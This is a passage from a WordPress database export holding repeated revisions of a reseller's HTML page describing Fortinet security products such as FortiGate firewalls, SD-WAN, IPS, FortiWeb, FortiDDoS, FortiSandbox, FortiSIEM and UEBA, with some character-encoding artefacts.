<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3></h3>\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Sandbox</strong></h4>\r\n</li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 13:01:31','2019-09-30 05:01:31','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3560,1,'2019-09-30 14:15:11','2019-09-30 06:15:11','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Web Application Firewall (WAF)</strong></h4>\r\n</li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3></h3>\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Sandbox</strong></h4>\r\n</li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 